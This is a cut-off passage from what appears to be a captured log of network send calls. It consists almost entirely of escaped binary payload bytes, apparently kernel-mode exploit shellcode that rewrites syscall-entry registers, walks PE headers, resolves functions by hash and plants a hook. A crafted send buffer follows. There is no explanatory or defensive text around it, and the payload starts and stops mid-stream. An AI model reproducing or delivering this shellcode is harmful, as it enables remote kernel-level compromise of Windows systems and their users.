xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea 
\\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\
x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR
\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\
x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\
\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\
\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 10, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\
\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00
\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea 
